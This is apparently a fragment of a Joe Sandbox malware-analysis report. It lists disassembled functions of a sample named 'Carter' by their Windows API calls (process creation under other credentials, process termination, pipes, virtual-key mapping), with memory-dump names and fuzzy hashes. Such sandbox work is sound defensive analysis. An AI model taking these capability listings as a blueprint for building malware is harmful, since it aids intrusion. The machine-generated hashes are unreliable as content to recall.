                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002C9250
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 002C9264
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: cabc65abfd5804fc6a4d41f1c882785e951cf5d3a4a86b1e4b9070aa7759509a
                                                                            • Instruction ID: 0b520cacec5afcbb06cee26b3e4ef161eea34e0b371bd4c99f0c115ed36e23c4
                                                                            • Opcode Fuzzy Hash: cabc65abfd5804fc6a4d41f1c882785e951cf5d3a4a86b1e4b9070aa7759509a
                                                                            • Instruction Fuzzy Hash: 28114A7250124AABDB028F94DD4DFDA7BADEB08705F044159FE04A2160C6B69DA0DB61
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 002CC34E
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 002CC35F
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002CC366
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 002CC36E
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 002CC385
                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 002CC397
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: d1529c2b4f19e337a5b21a92622505893751337200f89176d3b5a34299ed23ba
                                                                            • Instruction ID: 1604e73ff17c548512bffb2200768627536d7c5a318750211558a10c1a6a7bb6
                                                                            • Opcode Fuzzy Hash: d1529c2b4f19e337a5b21a92622505893751337200f89176d3b5a34299ed23ba
                                                                            • Instruction Fuzzy Hash: 27018475E01209BBEF119FA59C49F5EBFBCEB48311F004066FA08A7280DA319C10CFA0
                                                                            APIs
                                                                              • Part of subcall function 002716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00271729
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271738
                                                                              • Part of subcall function 002716CF: BeginPath.GDI32(?), ref: 0027174F
                                                                              • Part of subcall function 002716CF: SelectObject.GDI32(?,00000000), ref: 00271778
                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 002FC57C
                                                                            • LineTo.GDI32(00000000,00000003,?), ref: 002FC590
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002FC59E
                                                                            • LineTo.GDI32(00000000,00000000,?), ref: 002FC5AE
                                                                            • EndPath.GDI32(00000000), ref: 002FC5BE
                                                                            • StrokePath.GDI32(00000000), ref: 002FC5CE
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 5d10297e56dd5ed42289013a438d5c1b1a4683924cff6e599ecb7dfc767f7265
                                                                            • Instruction ID: 772a4c7a32a47a1eaab440197e27ca37b9f5e457ee6098a45ee290b852c4f271
                                                                            • Opcode Fuzzy Hash: 5d10297e56dd5ed42289013a438d5c1b1a4683924cff6e599ecb7dfc767f7265
                                                                            • Instruction Fuzzy Hash: C0111B7600110DBFDF129F91DC88FAA7FADEF08354F048022FA185A160C771AE65DBA0
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 002907EC
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 002907F4
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002907FF
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0029080A
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00290812
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0029081A
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: 95d13b2af2a306978382bd1fbd6acf48a8bc1f5b89ca0e6e06cf0b0fc400cfac
                                                                            • Instruction ID: e28d74319833789270e1691b564e48e525ba41fd78fe0b4273cd576c76292be5
                                                                            • Opcode Fuzzy Hash: 95d13b2af2a306978382bd1fbd6acf48a8bc1f5b89ca0e6e06cf0b0fc400cfac
                                                                            • Instruction Fuzzy Hash: 55016CB09027597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002D59B4
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002D59CA
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 002D59D9
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002D59E8
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002D59F2
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002D59F9
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 61cc5bfd4a5eb2a78597b5d52d67852d6374070b1b256ac123d8d7bd4b0bcc58
                                                                            • Instruction ID: 8d3d56aa0e3fdcb9c4c7eab86e9343c32736ba84f19b0a4c2ef17c3e66a81ff4
                                                                            • Opcode Fuzzy Hash: 61cc5bfd4a5eb2a78597b5d52d67852d6374070b1b256ac123d8d7bd4b0bcc58
                                                                            • Instruction Fuzzy Hash: 26F03036242158BBE7265B929C1DFEF7B7CEFC6B11F00015AFA0591050DBB11A1186B5
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 002D77FE
                                                                            • EnterCriticalSection.KERNEL32(?,?,0027C2B6,?,?), ref: 002D780F
                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,0027C2B6,?,?), ref: 002D781C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0027C2B6,?,?), ref: 002D7829
                                                                              • Part of subcall function 002D71F0: CloseHandle.KERNEL32(00000000,?,002D7836,?,0027C2B6,?,?), ref: 002D71FA
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 002D783C
                                                                            • LeaveCriticalSection.KERNEL32(?,?,0027C2B6,?,?), ref: 002D7843
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 3b24d6a46b90f19dfe62ac55a80d546cc6411c8ba86bcb599c90f7b31153c9b3
                                                                            • Instruction ID: e52542222458fd542860b8c353b8c19e3afdcf24f11cf4f8133f90f91e987f7a
                                                                            • Opcode Fuzzy Hash: 3b24d6a46b90f19dfe62ac55a80d546cc6411c8ba86bcb599c90f7b31153c9b3
                                                                            • Instruction Fuzzy Hash: 33F05836146212ABD71B2B64EC9CBAF773EFF49302F141823F202A51A0DBB95811DB60
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002C9555
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 002C9561
                                                                            • CloseHandle.KERNEL32(?), ref: 002C956A
                                                                            • CloseHandle.KERNEL32(?), ref: 002C9572
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 002C957B
                                                                            • HeapFree.KERNEL32(00000000), ref: 002C9582
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: c798d2761b1fc9ecb1361d493a4bbfe3bde4302178b8ecc8441c5473b86a3efe
                                                                            • Instruction ID: c3c7b92ab5ded24ed848fdb987aa28b65ea8eb12cceaab77713e5d6ce9ecf93d
                                                                            • Opcode Fuzzy Hash: c798d2761b1fc9ecb1361d493a4bbfe3bde4302178b8ecc8441c5473b86a3efe
                                                                            • Instruction Fuzzy Hash: 16E0E53A005101BBDB0B1FE1EC1CA5ABF3DFF49722F104222F21981070CB32A460DB90
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 002E8CFD
                                                                            • CharUpperBuffW.USER32(?,?), ref: 002E8E0C
                                                                            • VariantClear.OLEAUT32(?), ref: 002E8F84
                                                                              • Part of subcall function 002D7B1D: VariantInit.OLEAUT32(00000000), ref: 002D7B5D
                                                                              • Part of subcall function 002D7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 002D7B66
                                                                              • Part of subcall function 002D7B1D: VariantClear.OLEAUT32(00000000), ref: 002D7B72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                            • API String ID: 4237274167-1221869570
                                                                            • Opcode ID: 566e21058e6b6c4eb11884fd3318852a038ae6c6890a4087844fd11b252eca11
                                                                            • Instruction ID: 56adbbcdb6b7083e1f5a347fb6da6175f17004284733f0eb7040fe62cc25abdd
                                                                            • Opcode Fuzzy Hash: 566e21058e6b6c4eb11884fd3318852a038ae6c6890a4087844fd11b252eca11
                                                                            • Instruction Fuzzy Hash: 80919C746283419FC710EF25C48095ABBF5EF89314F44896EF88A8B3A2DB31E915CF52
                                                                            APIs
                                                                              • Part of subcall function 0028436A: _wcscpy.LIBCMT ref: 0028438D
                                                                            • _memset.LIBCMT ref: 002D332E
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002D335D
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002D3410
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 002D343E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                            • String ID: 0
                                                                            • API String ID: 4152858687-4108050209
                                                                            • Opcode ID: fef1be2c983232d5d7f363175d6be66769c537deeee98ad9d6e81fcec6a14202
                                                                            • Instruction ID: 5736542523d247667b8eb5e1f5dd7ac19b72fb332794e9166302ffab65e7fb4b
                                                                            • Opcode Fuzzy Hash: fef1be2c983232d5d7f363175d6be66769c537deeee98ad9d6e81fcec6a14202
                                                                            • Instruction Fuzzy Hash: 7751EE716283029BD726EF28D94566BB7E8AB45320F04062FF891D22D1DB74CE64CB93
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D2F67
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002D2F83
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 002D2FC9
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00337890,00000000), ref: 002D3012
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1173514356-4108050209
                                                                            • Opcode ID: e0405635d266e3b23d01962a64a296b8889e6d0a099350d92346cfb6584823db
                                                                            • Instruction ID: ba7e53e864dbca72f2b4694c5f36e0bd5d44739f39c63ffd6c40c1b8efe9ed8f
                                                                            • Opcode Fuzzy Hash: e0405635d266e3b23d01962a64a296b8889e6d0a099350d92346cfb6584823db
                                                                            • Instruction Fuzzy Hash: CC419F312293429FD724DF24C884B1ABBE8AB85310F144A1FF5A5973D1D770EE29CB52
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002C9ACC
                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002C9ADF
                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 002C9B0F
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 365058703-1403004172
                                                                            • Opcode ID: 9dcaa80ab98c900c19f00a609bb2b565304a041d46820d03a65b88fdf918a2d5
                                                                            • Instruction ID: 534228935545881cb9b0ac771abc95c8fdecb8951783cf368f71b41eec0c13e2
                                                                            • Opcode Fuzzy Hash: 9dcaa80ab98c900c19f00a609bb2b565304a041d46820d03a65b88fdf918a2d5
                                                                            • Instruction Fuzzy Hash: 3A21F2759621047FDB19EBA0DC8AEFEB76CDF45350F10421AF825932D0DB354D6A8B20
                                                                            APIs
                                                                              • Part of subcall function 00272111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0027214F
                                                                              • Part of subcall function 00272111: GetStockObject.GDI32(00000011), ref: 00272163
                                                                              • Part of subcall function 00272111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0027216D
                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002F6A86
                                                                            • LoadLibraryW.KERNEL32(?), ref: 002F6A8D
                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002F6AA2
                                                                            • DestroyWindow.USER32(?), ref: 002F6AAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 6f055af7c79f2a08b209b374b21ebebbeb5d995d6b24c99ca0681a0bf4b304ef
                                                                            • Instruction ID: 7b136e29320222ddd3d0f4e73b123a117a1a57d17c95c7b42764cb4e196d9312
                                                                            • Opcode Fuzzy Hash: 6f055af7c79f2a08b209b374b21ebebbeb5d995d6b24c99ca0681a0bf4b304ef
                                                                            • Instruction Fuzzy Hash: 9821A77112010AAFEF118F64DC89EBBB7ADEF553A4F108629FB50A2190D371DC619760
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 002D7377
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D73AA
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 002D73BC
                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002D73F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 0f785c51640fc13bde6fa62931be017b5d5bc898316a63dc7d144996a944f78e
                                                                            • Instruction ID: 23640ba79cf6dcbb768bdd65a3a1bf1823516ef8ed00359e26ec0831c1d5bd80
                                                                            • Opcode Fuzzy Hash: 0f785c51640fc13bde6fa62931be017b5d5bc898316a63dc7d144996a944f78e
                                                                            • Instruction Fuzzy Hash: 5F219270518307ABDB209F69DC45A9A7BA8AF54720F204A5BFCA0D73D0E774DC60DB50
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 002D7444
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002D7476
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 002D7487
                                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002D74C1
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$FilePipe
                                                                            • String ID: nul
                                                                            • API String ID: 4209266947-2873401336
                                                                            • Opcode ID: 44973a080dbd80e4af218172f70e885ff7e3603b6754c8e33c97a7815e63ae85
                                                                            • Instruction ID: c32aead60ae007c53e918d57fd69b2801825947f7dc575c73c0000812e6f9ce5
                                                                            • Opcode Fuzzy Hash: 44973a080dbd80e4af218172f70e885ff7e3603b6754c8e33c97a7815e63ae85
                                                                            • Instruction Fuzzy Hash: 7721A1316183069BDB219F689C49E9A7BB8AF55730F204B1AFDA0D73D0EB749C60CB50
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 002DB297
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002DB2EB
                                                                            • __swprintf.LIBCMT ref: 002DB304
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00300980), ref: 002DB342
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                            • String ID: %lu
                                                                            • API String ID: 3164766367-685833217
                                                                            • Opcode ID: b9c20cbba79de29bf04d3a3a6d4282b99f794c8ee6f6be9aa49df88c2a0c73b0
                                                                            • Instruction ID: f5f4b83a08c52ae8547e3dc2a914ed5bbd6b8f5b8ab93c54c409aa8eca758878
                                                                            • Opcode Fuzzy Hash: b9c20cbba79de29bf04d3a3a6d4282b99f794c8ee6f6be9aa49df88c2a0c73b0
                                                                            • Instruction Fuzzy Hash: 32218E34A00108AFCB10EF64C885EAEB7B8EF89304F008069F809E7252DB31EE51CF61
                                                                            APIs
